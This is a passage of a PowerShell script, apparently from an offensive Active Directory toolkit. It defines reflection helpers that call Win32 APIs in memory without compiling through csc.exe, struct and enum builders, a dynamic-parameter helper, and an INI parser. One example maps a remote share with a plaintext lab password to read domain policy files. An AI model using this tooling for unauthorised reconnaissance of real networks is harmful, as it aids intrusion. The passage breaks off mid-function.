+{ +<# +.SYNOPSIS + +Creates a .NET type for an unmanaged Win32 function. + +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: func + +.DESCRIPTION + +Add-Win32Type enables you to easily interact with unmanaged (i.e. +Win32 unmanaged) functions in PowerShell. After providing +Add-Win32Type with a function signature, a .NET type is created +using reflection (i.e. csc.exe is never called like with Add-Type). + +The 'func' helper function can be used to reduce typing when defining +multiple function definitions. + +.PARAMETER DllName + +The name of the DLL. + +.PARAMETER FunctionName + +The name of the target function. + +.PARAMETER EntryPoint + +The DLL export function name. This argument should be specified if the +specified function name is different than the name of the exported +function. 
+ +.PARAMETER ReturnType + +The return type of the function. + +.PARAMETER ParameterTypes + +The function parameters. + +.PARAMETER NativeCallingConvention + +Specifies the native calling convention of the function. Defaults to +stdcall. + +.PARAMETER Charset + +If you need to explicitly call an 'A' or 'W' Win32 function, you can +specify the character set. + +.PARAMETER SetLastError + +Indicates whether the callee calls the SetLastError Win32 API +function before returning from the attributed method. + +.PARAMETER Module + +The in-memory module that will host the functions. Use +New-InMemoryModule to define an in-memory module. + +.PARAMETER Namespace + +An optional namespace to prepend to the type. Add-Win32Type defaults +to a namespace consisting only of the name of the DLL. + +.EXAMPLE + +$Mod = New-InMemoryModule -ModuleName Win32 + +$FunctionDefinitions = @( + (func kernel32 GetProcAddress ([IntPtr]) @([IntPtr], [String]) -Charset Ansi -SetLastError), + (func kernel32 GetModuleHandle ([Intptr]) @([String]) -SetLastError), + (func ntdll RtlGetCurrentPeb ([IntPtr]) @()) +) + +$Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32' +$Kernel32 = $Types['kernel32'] +$Ntdll = $Types['ntdll'] +$Ntdll::RtlGetCurrentPeb() +$ntdllbase = $Kernel32::GetModuleHandle('ntdll') +$Kernel32::GetProcAddress($ntdllbase, 'RtlGetCurrentPeb') + +.NOTES + +Inspired by Lee Holmes' Invoke-WindowsApi http://poshcode.org/2189 + +When defining multiple function prototypes, it is ideal to provide +Add-Win32Type with an array of function signatures. That way, they +are all incorporated into the same in-memory module. 
+#> + + [OutputType([Hashtable])] + Param( + [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)] + [String] + $DllName, + + [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)] + [String] + $FunctionName, + + [Parameter(ValueFromPipelineByPropertyName=$True)] + [String] + $EntryPoint, + + [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)] + [Type] + $ReturnType, + + [Parameter(ValueFromPipelineByPropertyName=$True)] + [Type[]] + $ParameterTypes, + + [Parameter(ValueFromPipelineByPropertyName=$True)] + [Runtime.InteropServices.CallingConvention] + $NativeCallingConvention = [Runtime.InteropServices.CallingConvention]::StdCall, + + [Parameter(ValueFromPipelineByPropertyName=$True)] + [Runtime.InteropServices.CharSet] + $Charset = [Runtime.InteropServices.CharSet]::Auto, + + [Parameter(ValueFromPipelineByPropertyName=$True)] + [Switch] + $SetLastError, + + [Parameter(Mandatory=$True)] + [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})] + $Module, + + [ValidateNotNull()] + [String] + $Namespace = '' + ) + + BEGIN + { + $TypeHash = @{} + } + + PROCESS + { + if ($Module -is [Reflection.Assembly]) + { + if ($Namespace) + { + $TypeHash[$DllName] = $Module.GetType("$Namespace.$DllName") + } + else + { + $TypeHash[$DllName] = $Module.GetType($DllName) + } + } + else + { + # Define one type for each DLL + if (!$TypeHash.ContainsKey($DllName)) + { + if ($Namespace) + { + $TypeHash[$DllName] = $Module.DefineType("$Namespace.$DllName", 'Public,BeforeFieldInit') + } + else + { + $TypeHash[$DllName] = $Module.DefineType($DllName, 'Public,BeforeFieldInit') + } + } + + $Method = $TypeHash[$DllName].DefineMethod( + $FunctionName, + 'Public,Static,PinvokeImpl', + $ReturnType, + $ParameterTypes) + + # Make each ByRef parameter an Out parameter + $i = 1 + foreach($Parameter in $ParameterTypes) + { + if ($Parameter.IsByRef) + { + [void] $Method.DefineParameter($i, 'Out', $null) + } + + $i++ + } 
+ + $DllImport = [Runtime.InteropServices.DllImportAttribute] + $SetLastErrorField = $DllImport.GetField('SetLastError') + $CallingConventionField = $DllImport.GetField('CallingConvention') + $CharsetField = $DllImport.GetField('CharSet') + $EntryPointField = $DllImport.GetField('EntryPoint') + if ($SetLastError) { $SLEValue = $True } else { $SLEValue = $False } + + if ($PSBoundParameters['EntryPoint']) { $ExportedFuncName = $EntryPoint } else { $ExportedFuncName = $FunctionName } + + # Equivalent to C# version of [DllImport(DllName)] + $Constructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor([String]) + $DllImportAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($Constructor, + $DllName, [Reflection.PropertyInfo[]] @(), [Object[]] @(), + [Reflection.FieldInfo[]] @($SetLastErrorField, + $CallingConventionField, + $CharsetField, + $EntryPointField), + [Object[]] @($SLEValue, + ([Runtime.InteropServices.CallingConvention] $NativeCallingConvention), + ([Runtime.InteropServices.CharSet] $Charset), + $ExportedFuncName)) + + $Method.SetCustomAttribute($DllImportAttribute) + } + } + + END + { + if ($Module -is [Reflection.Assembly]) + { + return $TypeHash + } + + $ReturnTypes = @{} + + foreach ($Key in $TypeHash.Keys) + { + $Type = $TypeHash[$Key].CreateType() + + $ReturnTypes[$Key] = $Type + } + + return $ReturnTypes + } +} + + +function psenum { +<# +.SYNOPSIS + +Creates an in-memory enumeration for use in your PowerShell session. + +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +.DESCRIPTION + +The 'psenum' function facilitates the creation of enums entirely in +memory using as close to a "C style" as PowerShell will allow. + +.PARAMETER Module + +The in-memory module that will host the enum. Use +New-InMemoryModule to define an in-memory module. + +.PARAMETER FullName + +The fully-qualified name of the enum. + +.PARAMETER Type + +The type of each enum element. 
+ +.PARAMETER EnumElements + +A hashtable of enum elements. + +.PARAMETER Bitfield + +Specifies that the enum should be treated as a bitfield. + +.EXAMPLE + +$Mod = New-InMemoryModule -ModuleName Win32 + +$ImageSubsystem = psenum $Mod PE.IMAGE_SUBSYSTEM UInt16 @{ + UNKNOWN = 0 + NATIVE = 1 # Image doesn't require a subsystem. + WINDOWS_GUI = 2 # Image runs in the Windows GUI subsystem. + WINDOWS_CUI = 3 # Image runs in the Windows character subsystem. + OS2_CUI = 5 # Image runs in the OS/2 character subsystem. + POSIX_CUI = 7 # Image runs in the Posix character subsystem. + NATIVE_WINDOWS = 8 # Image is a native Win9x driver. + WINDOWS_CE_GUI = 9 # Image runs in the Windows CE subsystem. + EFI_APPLICATION = 10 + EFI_BOOT_SERVICE_DRIVER = 11 + EFI_RUNTIME_DRIVER = 12 + EFI_ROM = 13 + XBOX = 14 + WINDOWS_BOOT_APPLICATION = 16 +} + +.NOTES + +PowerShell purists may disagree with the naming of this function but +again, this was developed in such a way so as to emulate a "C style" +definition as closely as possible. Sorry, I'm not going to name it +New-Enum. 
:P +#> + + [OutputType([Type])] + Param ( + [Parameter(Position = 0, Mandatory=$True)] + [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})] + $Module, + + [Parameter(Position = 1, Mandatory=$True)] + [ValidateNotNullOrEmpty()] + [String] + $FullName, + + [Parameter(Position = 2, Mandatory=$True)] + [Type] + $Type, + + [Parameter(Position = 3, Mandatory=$True)] + [ValidateNotNullOrEmpty()] + [Hashtable] + $EnumElements, + + [Switch] + $Bitfield + ) + + if ($Module -is [Reflection.Assembly]) + { + return ($Module.GetType($FullName)) + } + + $EnumType = $Type -as [Type] + + $EnumBuilder = $Module.DefineEnum($FullName, 'Public', $EnumType) + + if ($Bitfield) + { + $FlagsConstructor = [FlagsAttribute].GetConstructor(@()) + $FlagsCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($FlagsConstructor, @()) + $EnumBuilder.SetCustomAttribute($FlagsCustomAttribute) + } + + foreach ($Key in $EnumElements.Keys) + { + # Apply the specified enum type to each element + $null = $EnumBuilder.DefineLiteral($Key, $EnumElements[$Key] -as $EnumType) + } + + $EnumBuilder.CreateType() +} + + +# A helper function used to reduce typing while defining struct +# fields. +function field { + Param ( + [Parameter(Position = 0, Mandatory=$True)] + [UInt16] + $Position, + + [Parameter(Position = 1, Mandatory=$True)] + [Type] + $Type, + + [Parameter(Position = 2)] + [UInt16] + $Offset, + + [Object[]] + $MarshalAs + ) + + @{ + Position = $Position + Type = $Type -as [Type] + Offset = $Offset + MarshalAs = $MarshalAs + } +} + + +function struct +{ +<# +.SYNOPSIS + +Creates an in-memory struct for use in your PowerShell session. + +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: field + +.DESCRIPTION + +The 'struct' function facilitates the creation of structs entirely in +memory using as close to a "C style" as PowerShell will allow. 
Struct +fields are specified using a hashtable where each field of the struct +is comprosed of the order in which it should be defined, its .NET +type, and optionally, its offset and special marshaling attributes. + +One of the features of 'struct' is that after your struct is defined, +it will come with a built-in GetSize method as well as an explicit +converter so that you can easily cast an IntPtr to the struct without +relying upon calling SizeOf and/or PtrToStructure in the Marshal +class. + +.PARAMETER Module + +The in-memory module that will host the struct. Use +New-InMemoryModule to define an in-memory module. + +.PARAMETER FullName + +The fully-qualified name of the struct. + +.PARAMETER StructFields + +A hashtable of fields. Use the 'field' helper function to ease +defining each field. + +.PARAMETER PackingSize + +Specifies the memory alignment of fields. + +.PARAMETER ExplicitLayout + +Indicates that an explicit offset for each field will be specified. + +.EXAMPLE + +$Mod = New-InMemoryModule -ModuleName Win32 + +$ImageDosSignature = psenum $Mod PE.IMAGE_DOS_SIGNATURE UInt16 @{ + DOS_SIGNATURE = 0x5A4D + OS2_SIGNATURE = 0x454E + OS2_SIGNATURE_LE = 0x454C + VXD_SIGNATURE = 0x454C +} + +$ImageDosHeader = struct $Mod PE.IMAGE_DOS_HEADER @{ + e_magic = field 0 $ImageDosSignature + e_cblp = field 1 UInt16 + e_cp = field 2 UInt16 + e_crlc = field 3 UInt16 + e_cparhdr = field 4 UInt16 + e_minalloc = field 5 UInt16 + e_maxalloc = field 6 UInt16 + e_ss = field 7 UInt16 + e_sp = field 8 UInt16 + e_csum = field 9 UInt16 + e_ip = field 10 UInt16 + e_cs = field 11 UInt16 + e_lfarlc = field 12 UInt16 + e_ovno = field 13 UInt16 + e_res = field 14 UInt16[] -MarshalAs @('ByValArray', 4) + e_oemid = field 15 UInt16 + e_oeminfo = field 16 UInt16 + e_res2 = field 17 UInt16[] -MarshalAs @('ByValArray', 10) + e_lfanew = field 18 Int32 +} + +# Example of using an explicit layout in order to create a union. 
+$TestUnion = struct $Mod TestUnion @{ + field1 = field 0 UInt32 0 + field2 = field 1 IntPtr 0 +} -ExplicitLayout + +.NOTES + +PowerShell purists may disagree with the naming of this function but +again, this was developed in such a way so as to emulate a "C style" +definition as closely as possible. Sorry, I'm not going to name it +New-Struct. :P +#> + + [OutputType([Type])] + Param ( + [Parameter(Position = 1, Mandatory=$True)] + [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})] + $Module, + + [Parameter(Position = 2, Mandatory=$True)] + [ValidateNotNullOrEmpty()] + [String] + $FullName, + + [Parameter(Position = 3, Mandatory=$True)] + [ValidateNotNullOrEmpty()] + [Hashtable] + $StructFields, + + [Reflection.Emit.PackingSize] + $PackingSize = [Reflection.Emit.PackingSize]::Unspecified, + + [Switch] + $ExplicitLayout + ) + + if ($Module -is [Reflection.Assembly]) + { + return ($Module.GetType($FullName)) + } + + [Reflection.TypeAttributes] $StructAttributes = 'AnsiClass, + Class, + Public, + Sealed, + BeforeFieldInit' + + if ($ExplicitLayout) + { + $StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::ExplicitLayout + } + else + { + $StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::SequentialLayout + } + + $StructBuilder = $Module.DefineType($FullName, $StructAttributes, [ValueType], $PackingSize) + $ConstructorInfo = [Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0] + $SizeConst = @([Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst')) + + $Fields = New-Object Hashtable[]($StructFields.Count) + + # Sort each field according to the orders specified + # Unfortunately, PSv2 doesn't have the luxury of the + # hashtable [Ordered] accelerator. 
+ foreach ($Field in $StructFields.Keys) + { + $Index = $StructFields[$Field]['Position'] + $Fields[$Index] = @{FieldName = $Field; Properties = $StructFields[$Field]} + } + + foreach ($Field in $Fields) + { + $FieldName = $Field['FieldName'] + $FieldProp = $Field['Properties'] + + $Offset = $FieldProp['Offset'] + $Type = $FieldProp['Type'] + $MarshalAs = $FieldProp['MarshalAs'] + + $NewField = $StructBuilder.DefineField($FieldName, $Type, 'Public') + + if ($MarshalAs) + { + $UnmanagedType = $MarshalAs[0] -as ([Runtime.InteropServices.UnmanagedType]) + if ($MarshalAs[1]) + { + $Size = $MarshalAs[1] + $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, + $UnmanagedType, $SizeConst, @($Size)) + } + else + { + $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, [Object[]] @($UnmanagedType)) + } + + $NewField.SetCustomAttribute($AttribBuilder) + } + + if ($ExplicitLayout) { $NewField.SetOffset($Offset) } + } + + # Make the struct aware of its own size. + # No more having to call [Runtime.InteropServices.Marshal]::SizeOf! + $SizeMethod = $StructBuilder.DefineMethod('GetSize', + 'Public, Static', + [Int], + [Type[]] @()) + $ILGenerator = $SizeMethod.GetILGenerator() + # Thanks for the help, Jason Shirk! + $ILGenerator.Emit([Reflection.Emit.OpCodes]::Ldtoken, $StructBuilder) + $ILGenerator.Emit([Reflection.Emit.OpCodes]::Call, + [Type].GetMethod('GetTypeFromHandle')) + $ILGenerator.Emit([Reflection.Emit.OpCodes]::Call, + [Runtime.InteropServices.Marshal].GetMethod('SizeOf', [Type[]] @([Type]))) + $ILGenerator.Emit([Reflection.Emit.OpCodes]::Ret) + + # Allow for explicit casting from an IntPtr + # No more having to call [Runtime.InteropServices.Marshal]::PtrToStructure! 
+ $ImplicitConverter = $StructBuilder.DefineMethod('op_Implicit', + 'PrivateScope, Public, Static, HideBySig, SpecialName', + $StructBuilder, + [Type[]] @([IntPtr])) + $ILGenerator2 = $ImplicitConverter.GetILGenerator() + $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Nop) + $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ldarg_0) + $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ldtoken, $StructBuilder) + $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Call, + [Type].GetMethod('GetTypeFromHandle')) + $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Call, + [Runtime.InteropServices.Marshal].GetMethod('PtrToStructure', [Type[]] @([IntPtr], [Type]))) + $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Unbox_Any, $StructBuilder) + $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ret) + + $StructBuilder.CreateType() +} + + +######################################################## +# +# Misc. helpers +# +######################################################## + +Function New-DynamicParameter { +<# +.SYNOPSIS + +Helper function to simplify creating dynamic parameters. + + Adapated from https://beatcracker.wordpress.com/2015/08/10/dynamic-parameters-validateset-and-enums/. + Originally released under the Microsoft Public License (Ms-PL). + +.DESCRIPTION + +Helper function to simplify creating dynamic parameters. + +Example use cases: + Include parameters only if your environment dictates it + Include parameters depending on the value of a user-specified parameter + Provide tab completion and intellisense for parameters, depending on the environment + +Please keep in mind that all dynamic parameters you create, will not have corresponding variables created. + Use New-DynamicParameter with 'CreateVariables' switch in your main code block, + ('Process' for advanced functions) to create those variables. + Alternatively, manually reference $PSBoundParameters for the dynamic parameter value. + +This function has two operating modes: + +1. 
All dynamic parameters created in one pass using pipeline input to the function. This mode allows to create dynamic parameters en masse, +with one function call. There is no need to create and maintain custom RuntimeDefinedParameterDictionary. + +2. Dynamic parameters are created by separate function calls and added to the RuntimeDefinedParameterDictionary you created beforehand. +Then you output this RuntimeDefinedParameterDictionary to the pipeline. This allows more fine-grained control of the dynamic parameters, +with custom conditions and so on. + +.NOTES + +Credits to jrich523 and ramblingcookiemonster for their initial code and inspiration: + https://github.com/RamblingCookieMonster/PowerShell/blob/master/New-DynamicParam.ps1 + http://ramblingcookiemonster.wordpress.com/2014/11/27/quick-hits-credentials-and-dynamic-parameters/ + http://jrich523.wordpress.com/2013/05/30/powershell-simple-way-to-add-dynamic-parameters-to-advanced-function/ + +Credit to BM for alias and type parameters and their handling + +.PARAMETER Name + +Name of the dynamic parameter + +.PARAMETER Type + +Type for the dynamic parameter. Default is string + +.PARAMETER Alias + +If specified, one or more aliases to assign to the dynamic parameter + +.PARAMETER Mandatory + +If specified, set the Mandatory attribute for this dynamic parameter + +.PARAMETER Position + +If specified, set the Position attribute for this dynamic parameter + +.PARAMETER HelpMessage + +If specified, set the HelpMessage for this dynamic parameter + +.PARAMETER DontShow + +If specified, set the DontShow for this dynamic parameter. +This is the new PowerShell 4.0 attribute that hides parameter from tab-completion. 
+http://www.powershellmagazine.com/2013/07/29/pstip-hiding-parameters-from-tab-completion/ + +.PARAMETER ValueFromPipeline + +If specified, set the ValueFromPipeline attribute for this dynamic parameter + +.PARAMETER ValueFromPipelineByPropertyName + +If specified, set the ValueFromPipelineByPropertyName attribute for this dynamic parameter + +.PARAMETER ValueFromRemainingArguments + +If specified, set the ValueFromRemainingArguments attribute for this dynamic parameter + +.PARAMETER ParameterSetName + +If specified, set the ParameterSet attribute for this dynamic parameter. By default parameter is added to all parameters sets. + +.PARAMETER AllowNull + +If specified, set the AllowNull attribute of this dynamic parameter + +.PARAMETER AllowEmptyString + +If specified, set the AllowEmptyString attribute of this dynamic parameter + +.PARAMETER AllowEmptyCollection + +If specified, set the AllowEmptyCollection attribute of this dynamic parameter + +.PARAMETER ValidateNotNull + +If specified, set the ValidateNotNull attribute of this dynamic parameter + +.PARAMETER ValidateNotNullOrEmpty + +If specified, set the ValidateNotNullOrEmpty attribute of this dynamic parameter + +.PARAMETER ValidateRange + +If specified, set the ValidateRange attribute of this dynamic parameter + +.PARAMETER ValidateLength + +If specified, set the ValidateLength attribute of this dynamic parameter + +.PARAMETER ValidatePattern + +If specified, set the ValidatePattern attribute of this dynamic parameter + +.PARAMETER ValidateScript + +If specified, set the ValidateScript attribute of this dynamic parameter + +.PARAMETER ValidateSet + +If specified, set the ValidateSet attribute of this dynamic parameter + +.PARAMETER Dictionary + +If specified, add resulting RuntimeDefinedParameter to an existing RuntimeDefinedParameterDictionary. +Appropriate for custom dynamic parameters creation. 
+ +If not specified, create and return a RuntimeDefinedParameterDictionary +Appropriate for a simple dynamic parameter creation. +#> + + [CmdletBinding(DefaultParameterSetName = 'DynamicParameter')] + Param ( + [Parameter(Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [ValidateNotNullOrEmpty()] + [string]$Name, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [System.Type]$Type = [int], + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [string[]]$Alias, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$Mandatory, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [int]$Position, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [string]$HelpMessage, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$DontShow, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$ValueFromPipeline, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$ValueFromPipelineByPropertyName, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$ValueFromRemainingArguments, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [string]$ParameterSetName = '__AllParameterSets', + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$AllowNull, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$AllowEmptyString, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + 
[switch]$AllowEmptyCollection, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$ValidateNotNull, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$ValidateNotNullOrEmpty, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [ValidateCount(2,2)] + [int[]]$ValidateCount, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [ValidateCount(2,2)] + [int[]]$ValidateRange, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [ValidateCount(2,2)] + [int[]]$ValidateLength, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [ValidateNotNullOrEmpty()] + [string]$ValidatePattern, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [ValidateNotNullOrEmpty()] + [scriptblock]$ValidateScript, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [ValidateNotNullOrEmpty()] + [string[]]$ValidateSet, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [ValidateNotNullOrEmpty()] + [ValidateScript({ + if(!($_ -is [System.Management.Automation.RuntimeDefinedParameterDictionary])) + { + Throw 'Dictionary must be a System.Management.Automation.RuntimeDefinedParameterDictionary object' + } + $true + })] + $Dictionary = $false, + + [Parameter(Mandatory = $true, ValueFromPipelineByPropertyName = $true, ParameterSetName = 'CreateVariables')] + [switch]$CreateVariables, + + [Parameter(Mandatory = $true, ValueFromPipelineByPropertyName = $true, ParameterSetName = 'CreateVariables')] + [ValidateNotNullOrEmpty()] + [ValidateScript({ + # System.Management.Automation.PSBoundParametersDictionary is an internal sealed class, + # so one can't use PowerShell's '-is' operator to 
validate type. + if($_.GetType().Name -notmatch 'Dictionary') { + Throw 'BoundParameters must be a System.Management.Automation.PSBoundParametersDictionary object' + } + $true + })] + $BoundParameters + ) + + Begin { + $InternalDictionary = New-Object -TypeName System.Management.Automation.RuntimeDefinedParameterDictionary + function _temp { [CmdletBinding()] Param() } + $CommonParameters = (Get-Command _temp).Parameters.Keys + } + + Process { + if($CreateVariables) { + $BoundKeys = $BoundParameters.Keys | Where-Object { $CommonParameters -notcontains $_ } + ForEach($Parameter in $BoundKeys) { + if ($Parameter) { + Set-Variable -Name $Parameter -Value $BoundParameters.$Parameter -Scope 1 -Force + } + } + } + else { + $StaleKeys = @() + $StaleKeys = $PSBoundParameters.GetEnumerator() | + ForEach-Object { + if($_.Value.PSobject.Methods.Name -match '^Equals$') { + # If object has Equals, compare bound key and variable using it + if(!$_.Value.Equals((Get-Variable -Name $_.Key -ValueOnly -Scope 0))) { + $_.Key + } + } + else { + # If object doesn't has Equals (e.g. 
$null), fallback to the PowerShell's -ne operator + if($_.Value -ne (Get-Variable -Name $_.Key -ValueOnly -Scope 0)) { + $_.Key + } + } + } + if($StaleKeys) { + $StaleKeys | ForEach-Object {[void]$PSBoundParameters.Remove($_)} + } + + # Since we rely solely on $PSBoundParameters, we don't have access to default values for unbound parameters + $UnboundParameters = (Get-Command -Name ($PSCmdlet.MyInvocation.InvocationName)).Parameters.GetEnumerator() | + # Find parameters that are belong to the current parameter set + Where-Object { $_.Value.ParameterSets.Keys -contains $PsCmdlet.ParameterSetName } | + Select-Object -ExpandProperty Key | + # Find unbound parameters in the current parameter set + Where-Object { $PSBoundParameters.Keys -notcontains $_ } + + # Even if parameter is not bound, corresponding variable is created with parameter's default value (if specified) + $tmp = $null + ForEach ($Parameter in $UnboundParameters) { + $DefaultValue = Get-Variable -Name $Parameter -ValueOnly -Scope 0 + if(!$PSBoundParameters.TryGetValue($Parameter, [ref]$tmp) -and $DefaultValue) { + $PSBoundParameters.$Parameter = $DefaultValue + } + } + + if($Dictionary) { + $DPDictionary = $Dictionary + } + else { + $DPDictionary = $InternalDictionary + } + + # Shortcut for getting local variables + $GetVar = {Get-Variable -Name $_ -ValueOnly -Scope 0} + + # Strings to match attributes and validation arguments + $AttributeRegex = '^(Mandatory|Position|ParameterSetName|DontShow|HelpMessage|ValueFromPipeline|ValueFromPipelineByPropertyName|ValueFromRemainingArguments)$' + $ValidationRegex = '^(AllowNull|AllowEmptyString|AllowEmptyCollection|ValidateCount|ValidateLength|ValidatePattern|ValidateRange|ValidateScript|ValidateSet|ValidateNotNull|ValidateNotNullOrEmpty)$' + $AliasRegex = '^Alias$' + $ParameterAttribute = New-Object -TypeName System.Management.Automation.ParameterAttribute + + switch -regex ($PSBoundParameters.Keys) { + $AttributeRegex { + Try { + $ParameterAttribute.$_ = . 
$GetVar + } + Catch { + $_ + } + continue + } + } + + if($DPDictionary.Keys -contains $Name) { + $DPDictionary.$Name.Attributes.Add($ParameterAttribute) + } + else { + $AttributeCollection = New-Object -TypeName Collections.ObjectModel.Collection[System.Attribute] + switch -regex ($PSBoundParameters.Keys) { + $ValidationRegex { + Try { + $ParameterOptions = New-Object -TypeName "System.Management.Automation.${_}Attribute" -ArgumentList (. $GetVar) -ErrorAction Stop + $AttributeCollection.Add($ParameterOptions) + } + Catch { $_ } + continue + } + $AliasRegex { + Try { + $ParameterAlias = New-Object -TypeName System.Management.Automation.AliasAttribute -ArgumentList (. $GetVar) -ErrorAction Stop + $AttributeCollection.Add($ParameterAlias) + continue + } + Catch { $_ } + } + } + $AttributeCollection.Add($ParameterAttribute) + $Parameter = New-Object -TypeName System.Management.Automation.RuntimeDefinedParameter -ArgumentList @($Name, $Type, $AttributeCollection) + $DPDictionary.Add($Name, $Parameter) + } + } + } + + End { + if(!$CreateVariables -and !$Dictionary) { + $DPDictionary + } + } +} + + +function Get-IniContent { +<# +.SYNOPSIS + +This helper parses an .ini file into a hashtable. + +Author: 'The Scripting Guys' +Modifications: @harmj0y (-Credential support) +License: BSD 3-Clause +Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection + +.DESCRIPTION + +Parses an .ini file into a hashtable. If -Credential is supplied, +then Add-RemoteConnection is used to map \\COMPUTERNAME\IPC$, the file +is parsed, and then the connection is destroyed with Remove-RemoteConnection. + +.PARAMETER Path + +Specifies the path to the .ini file to parse. + +.PARAMETER OutputObject + +Switch. Output a custom PSObject instead of a hashtable. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system. 
+ +.EXAMPLE + +Get-IniContent C:\Windows\example.ini + +.EXAMPLE + +"C:\Windows\example.ini" | Get-IniContent -OutputObject + +Outputs the .ini details as a proper nested PSObject. + +.EXAMPLE + +"C:\Windows\example.ini" | Get-IniContent + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-IniContent -Path \\PRIMARY.testlab.local\C$\Temp\GptTmpl.inf -Credential $Cred + +.INPUTS + +String + +Accepts one or more .ini paths on the pipeline. + +.OUTPUTS + +Hashtable + +Ouputs a hashtable representing the parsed .ini file. + +.LINK + +https://blogs.technet.microsoft.com/heyscriptingguy/2011/08/20/use-powershell-to-work-with-any-ini-file/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([Hashtable])] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('FullName', 'Name')] + [ValidateNotNullOrEmpty()] + [String[]] + $Path, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $OutputObject + ) + + BEGIN { + $MappedComputers = @{} + } + + PROCESS { + ForEach ($TargetPath in $Path) { + if (($TargetPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) { + $HostComputer = (New-Object System.Uri($TargetPath)).Host + if (-not $MappedComputers[$HostComputer]) { + # map IPC$ to this computer if it's not already + Add-RemoteConnection -ComputerName $HostComputer -Credential $Credential + $MappedComputers[$HostComputer] = $True + } + } + + if (Test-Path -Path $TargetPath) { + if ($PSBoundParameters['OutputObject']) { + $IniObject = New-Object PSObject + } + else { + $IniObject = @{} + } + Switch -Regex -File $TargetPath { + "^\[(.+)\]" # Section + { + $Section = $matches[1].Trim() + 
